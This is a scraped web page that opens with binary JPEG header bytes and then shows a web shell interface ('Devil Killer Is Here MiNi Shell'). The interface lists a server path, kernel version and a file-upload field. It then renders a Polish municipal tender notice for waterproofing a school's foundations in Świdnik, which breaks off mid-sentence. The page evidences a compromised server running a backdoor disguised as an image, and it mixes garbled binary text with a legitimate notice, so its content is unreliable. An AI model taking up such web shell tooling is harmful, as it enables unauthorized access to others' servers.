JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251029/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251029/0050391601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja SP nr 5 w Świdniku w zakresie wykonania izolacji ścian fundamentowych oraz niwelacji terenu w celu zabezpieczenia szkoły przed zalewaniem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Świdnik</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019359</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stanisława Wyspiańskiego 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 751 76 02</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@e-swidnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://umswidnik.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Przedsiębiorstwo Komunalne PEGIMEK Sp z o.o.</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON: 430121305</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Al. Lotników Polskich 5</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">21-040</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">81 751 20 44</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">knowakowski@pegimek.swidnik.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.pegimek.swidnik.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja SP nr 5 w Świdniku w zakresie wykonania izolacji ścian fundamentowych oraz niwelacji terenu w celu zabezpieczenia szkoły przed zalewaniem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-be4491d0-9e38-42bb-92b5-af998cd05427</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00503916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00024000/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja SP nr 5 w Świdniku w zakresie wykonania izolacji ścian fundamentowych oraz niwelacji terenu w celu zabezpieczenia szkoły przed zalewaniem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pegimek.logintrade.net/zapytania_email,214377,2db5d647e3068ebd6ef73a5a15c087d1.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie będzie prowadzone na platformie przetargowej pod adresem:<br/>https://pegimek.logintrade.net/zapytania_email,214377,2db5d647e3068ebd6ef73a5a15c087d1.html (dalej zwana: „platformą”).<br/>Dostęp do tej strony jest możliwy również ze strony internetowej www.pegimek.swidnik.pl (zakładka PRZETARGI). Na podanej<br/>platformie przetargowej będą udostępnione zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 5) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną tj. za pomocą elektronicznej platformy przetargowej.<br/>2. Platforma wskazana w pkt 1.2 SWZ będzie służyła do składania ofert i wszelkich dokumentów i oświadczeń składanych wraz z<br/>ofertą.<br/>Platforma będzie służyła także do udostępniania SWZ, informacji o modyfikacji SWZ, przekazywania wniosków o wyjaśnienie treści<br/>SWZ, wyjaśnień treści SWZ o zamówieniu, wezwań do wyjaśnień lub uzupełnienia, wezwań do przedłożenia dokumentów i<br/>oświadczeń, wyjaśnień Wykonawców kierowanych w odpowiedzi na wezwania Zamawiającego, uzupełniania dokumentów<br/>(oświadczeń lub pełnomocnictw), udostępnienia informacji z otwarcia ofert, informacji o wyborze oferty najkorzystniejszej lub<br/>unieważnieniu postępowania wraz z zawiadomieniami skierowanymi do Wykonawców, udostępniania ofert, przekazywania<br/>wniosków o przedłużenie terminu związania ofertą i ważności wadium oraz zgód w tym zakresie.<br/>3. Przeglądanie postępowań, pobieranie dokumentów nie wymaga rejestracji ani logowania na Platformie. Rejestracji oraz logowania<br/>wymaga złożenie wniosków o wyjaśnienie treści SWZ i złożenie oferty.<br/>4. Logowania wymaga również przekazywanie wyjaśnień, dokumentów lub oświadczeń w odpowiedzi na wezwania Zamawiającego,<br/>kierowane w toku badania i oceny ofert.<br/>5. Wykonawca przed złożeniem wniosków o wyjaśnienie treści SWZ oraz przed złożeniem oferty winien dokładnie zapoznać się ze<br/>szczegółową instrukcją dostępną na Platformie pod adresem https://pegimek.logintrade.net/rejestracja/instrukcje.html .<br/>6. Złożenie oferty i pozostałych dokumentów oraz oświadczeń, o których mowa w SWZ wymaga zarejestrowania się przez<br/>Wykonawcę lub, w przypadku posiadania konta na Platformie, zalogowania. Rejestracja i logowanie są bezpłatne. Rejestrując się<br/>albo logując wykonawcy, akceptują warunki korzystania z platformy określone w Regulaminie zamieszczonym na platformie w<br/>zakładce REGULAMIN.<br/>7. Szczegółowe zasady korzystania z Platformy, w tym wymagania sprzętowo — techniczne umożliwiające korzystanie z Platformy<br/>(sporządzanie, wysyłanie i odbieranie korespondencji elektronicznej), szczegółowy sposób składania i wycofania ofert,<br/>przekazywania oświadczeń, dokumentów zostały określone w Instrukcjach Użytkownika dostępnych na platformie pod adresem<br/>https://pegimek.logintrade.net/rejestracja/instrukcje.html. Korzystanie z platformy jest bezpłatne. Maksymalny rozmiar przesyłanychplików: 150 MB.<br/>8. Wymagania techniczne, jakim musi odpowiadać sprzęt komputerowy wykonawcy, aby móc korzystać z Platformy:<br/>a) dopuszczalne przeglądarki internetowe:<br/>Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31, Mozilla Firefox 26, Opera 18.<br/>b) pozostałe wymagania techniczne:<br/>dostęp do sieci internet;<br/>- obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>- włączona obsługa JavaScript;<br/>- zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>- zainstalowany Acrobat Reader;<br/>- zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>9. Za datę złożenia dokumentów elektronicznych rozumie się datę ich wpływu na platformę, w przypadku złożenia oferty - datę<br/>wyświetlaną na koncie Zamawiającego wskazaną w kolumnie „data złożenia oferty”.<br/>10. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się zgodnie z<br/>zasadami określonymi w przepisach Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. 2020, poz. 2452).<br/>11. Pliki stanowiące ofertę powinny być uprzednio podpisane elektronicznie i dołączone do formularza złożenia oferty już z<br/>naniesionym podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, dalej „RODO”, informuję, że:<br/>1. administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Komunalne Pegimek Sp. z o.o., Al. Lotników Polskich 5,21-<br/>040 Świdnik, tel. 81 751-20-44 oraz Gmina Miejska Świdnik, ul.Wyspiańskiego 27, 21-040 Świdnik, tel. 81 751 76 02;<br/>2. we wszystkich sprawach związanych z przetwarzaniem Pani/Pana danych osobowych, jak również w przypadku pytań lub<br/>wątpliwości mogą się Państwo kontaktować z Inspektorem Ochrony Danych na adres e-mail: iod@pegimek.swidnik.pl (dla Pegimek<br/>Sp z o.o.) oraz adres e-mail: iod@e-swidnik.pl (dla Gminy Miejskiej Świdnik);<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego, prowadzonego w trybie podstawowym oraz jego rozstrzygnięcia, a także<br/>zawarcia umowy i jej realizacji, udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji. Obowiązek informacyjny Zamawiający realizuje poprzez zamieszczenie pełnej klauzuli informacyjnej w pkt 35 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp. Zgodnie z art. 19 ust. 3 ustawy Pzp w postępowaniu o udzielenie zamówienia<br/>zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/670, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">17/2025/GMS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja w systemie „zaprojektuj i wybuduj” zadania pn.:<br/>Modernizacja SP nr 5 w Świdniku w zakresie wykonania izolacji ścian fundamentowych oraz niwelacji terenu w celu<br/>zabezpieczenia szkoły przed zalewaniem<br/>1.1 Prace przygotowawcze<br/>Demontaż siłowni napowietrznej (9 elementów):<br/>- Urządzenia należy zdemontować i zabezpieczyć do ponownego montażu.<br/>- Elementy powinny być zabezpieczone antykorozyjnie.<br/>Zerwanie istniejącej elewacji:<br/>- Zerwanie elewacji do wysokości 40 cm na długości 38 mb (ok. 15,2 m²).<br/>- Utylizacja materiałów zgodnie z przepisami o odpadach budowlanych.<br/>Zerwanie opaski z lastryka i izolacji ze styropianu:<br/>- Styropian demontowany z poziomu stropu podbasenia.<br/>- Lastryko do skucia mechanicznego, grubość ok. 4–20 cm.<br/>Odkopanie ściany fundamentowej:<br/>- Odkopanie na głębokość ok. 4 m, zabezpieczenie wykopu (np. szalunki systemowe, skarpowanie).<br/>- Zakres: ok. 40 mb.<br/>Osuszenie i oczyszczenie powierzchni:<br/>- Mycie i piaskowanie/oczyszczenie powierzchni betonu.<br/>- Suszenie metodą konwekcyjną lub nagrzewnicami (przy wilgotności &gt; 6%), dopuszcza się suszenie innymi metodami.<br/>Naprawy miejscowe żelbetu:<br/>- Zastosowanie systemu naprawczej chemii budowlanej<br/>Parametry przykładowe:<br/>Wytrzymałość na ściskanie: &gt; 45 MPa (po 28 dniach).<br/>Przyczepność do podłoża: &gt; 1,5 MPa.<br/>Klasa R4 zgodnie z EN 1504-3.<br/>1.2 Wykonanie izolacji ciężkiej hydroizolacja pionowa i pozioma (ściana + strop podbasenia) – powierzchnia ok. 230 m².<br/>- Materiał: masa bitumiczna polimerowo-modyfikowana lub folia EPDM.<br/>- Parametry:<br/>Grubość warstwy: 3–5 mm (dla masy), 1,2–2 mm (dla folii EPDM).<br/>Odporność na wodę pod ciśnieniem: min. 0,5 MPa.<br/>Elastyczność w niskiej temperaturze: do -20°C.<br/>Przyczepność do betonu: &gt; 0,5 MPa.<br/>Izolacja termiczna – styrodur (XPS) na ścianie i stropie podbasenia – ok. 230 m²:<br/>- Parametry przykładowe:<br/>Grubość: 10 cm.<br/>Współczynnik przewodzenia ciepła (λ): ≤ 0,035 W/m·K.<br/>Wytrzymałość na ściskanie: ≥ 300 kPa.<br/>Nasiąkliwość wodą: &lt; 0,7% objętości.<br/>1.3 Roboty dodatkowe<br/>Demontaż i wykonanie nowej nawierzchni poliuretanowej – powierzchnia 54 m²:<br/>- Warstwy: gruntująca, elastyczna (PU), wierzchnia odporna na ścieranie.<br/>- Parametry:<br/>Grubość: 10–15 mm.<br/>Odporność na ścieranie: ≤ 0,1 g (PN-EN ISO 5470-1).<br/>Antypoślizgowość: ≥ 45 BPN.<br/>Opaska z kostki betonowej – długość 38 mb, szerokość min. 40 cm:<br/>- Kostka brukowa, grubość min. 6 cm.<br/>- Podsypka cementowo-piaskowa: 1:4, grubość 3–5 cm.<br/>- Obrzeża betonowe: 8 × 30 × 100 cm.<br/>Koryto i drenaż – 40 mb, głębokość ok. 3 m:<br/>- Rura drenażowa PVC perforowana min Ø 100 mm.<br/>- Otulina: żwir frakcji 8–16 mm.<br/>- Włóknina filtracyjna: min. 100 g/m².<br/>- Studzienki kontrolne co 10–15 m.<br/>- Spadek min. 0,5–1%.<br/>1.4. Prace końcowe<br/>Montaż siłowni napowietrznej po zakończeniu izolacji:<br/>- Ponowne posadowienie zgodnie z wcześniejszym rozmieszczeniem.<br/>- Zgodność z normą PN-EN 16630:2015 (wymagania bezpieczeństwa siłowni zewnętrznych).<br/>- Elementy powinny mieć:<br/>Malowanie proszkowe,<br/>Certyfikat CE,<br/>Odporność na warunki atmosferyczne i akty wandalizmu.<br/>Porządkowanie terenu, utylizacja odpadów:<br/>- Zgodnie z ustawą o odpadach (Dz.U. 2013 poz. 21 z późn. zm.).<br/>- Wykonawca odpowiedzialny za utylizację i wywóz odpadów.<br/>- Urobek i materiały rozbiórkowe (beton, styropian, asfalt, gruz) zagospodarowane we własnym zakresie.<br/>2. Szczegółowy opis przedmiotu zamówienia określa załącznik nr 6 – Opis przedmiotu zamówienia oraz załącznik nr 7 – Program funkcjonalno-użytkowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert odbywać się będzie w sposób wskazany w sekcji 14 SWZ na podstawie następujących kryteriów: jedynym kryterium jest cena - waga 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/>- wykonawca powinien wykazać należyte wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, robót budowlanych polegających na wykonaniu jednego<br/>lub więcej remontu fundamentów o łącznej wartości min. 100 000 zł (brutto).<br/>Uwaga: w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) warunek zostanie<br/>uznany za spełniony, jeżeli co najmniej jeden ze wspólników konsorcjum samodzielnie posiada wymagane doświadczenie<br/>(nie dopuszcza się sumowania potencjału wspólników w zakresie doświadczenia). Podobnie w przypadku powoływania się<br/>na zasoby podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu (w zakresie doświadczenia), podmiot ten<br/>musi samodzielnie posiadać doświadczenie opisane powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie<br/>art.109 ust.1 pkt 1 Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie<br/>w sprawie spłat tych należności;<br/>2) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające,<br/>że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.109 ust.1 pkt1 Pzp,<br/>wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na 